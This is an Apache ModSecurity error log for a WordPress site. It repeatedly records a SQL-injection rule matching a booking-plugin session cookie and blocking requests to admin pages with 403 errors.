[Mon May 11 22:28:30.842923 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI77no_DFxNSZVmaX3RtwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:30.843220 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI77no_DFxNSZVmaX3RtwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:31.437091 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI77no_DFxNSZVmaX3RtwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:32.441902 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI78Ho_DFxNSZVmaX3RuAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:32.442224 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI78Ho_DFxNSZVmaX3RuAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:33.050485 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI78Ho_DFxNSZVmaX3RuAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:33.348012 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI78Xo_DFxNSZVmaX3RugAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:33.348311 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI78Xo_DFxNSZVmaX3RugAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:33.980314 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI78Xo_DFxNSZVmaX3RugAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:34.344859 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI78no_DFxNSZVmaX3RvQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:34.345147 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI78no_DFxNSZVmaX3RvQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:34.745633 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI78no_DFxNSZVmaX3RvQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:35.642604 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI783o_DFxNSZVmaX3RvwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:35.642883 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI783o_DFxNSZVmaX3RvwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:44.530349 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI783o_DFxNSZVmaX3RvwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:49.142519 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8AXo_DFxNSZVmaX3RyQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:49.142808 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8AXo_DFxNSZVmaX3RyQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:49.729317 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8AXo_DFxNSZVmaX3RyQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:50.766332 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8Ano_DFxNSZVmaX3RzAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:50.766629 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8Ano_DFxNSZVmaX3RzAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:51.392744 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8Ano_DFxNSZVmaX3RzAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:52.148942 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8BHo_DFxNSZVmaX3RzgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:52.149232 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8BHo_DFxNSZVmaX3RzgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:52.739472 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8BHo_DFxNSZVmaX3RzgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:53.532700 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8BXo_DFxNSZVmaX3R0AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:53.532998 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8BXo_DFxNSZVmaX3R0AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:54.685609 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8BXo_DFxNSZVmaX3R0AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:54.928570 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8Bno_DFxNSZVmaX3R0wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:54.928848 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8Bno_DFxNSZVmaX3R0wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:55.289323 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8Bno_DFxNSZVmaX3R0wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:55.931728 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8B3o_DFxNSZVmaX3R1QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:55.932012 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8B3o_DFxNSZVmaX3R1QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:56.547574 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8B3o_DFxNSZVmaX3R1QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:57.037069 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8CXo_DFxNSZVmaX3R3wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:57.037363 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8CXo_DFxNSZVmaX3R3wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:57.645886 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8CXo_DFxNSZVmaX3R3wAAAMg"], referer: https://rentparadise.fr/wp-login.php
